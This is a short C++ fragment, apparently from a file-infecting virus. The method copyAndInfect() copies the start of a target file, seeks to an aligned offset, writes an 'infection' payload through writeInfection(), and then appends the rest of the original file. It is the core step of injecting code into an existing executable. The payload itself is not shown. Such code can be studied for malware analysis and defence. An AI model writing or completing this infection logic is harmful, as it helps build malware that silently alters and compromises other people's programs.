bool Target::copyAndInfect()
{
  write(fd_dst, p.b, end_of_cs); // first part of original target
  lseek(fd_dst, aligned_end_of_cs, SEEK_SET);

  unsigned code_size = writeInfection();
  fprintf(stderr, "wrote %u bytes, ", code_size);
  lseek(fd_dst, end_of_cs + INFECTION_SIZE, SEEK_SET);

  /* rest of original target */
  write(fd_dst, p.b + end_of_cs, filesize - end_of_cs);
  return true;
}
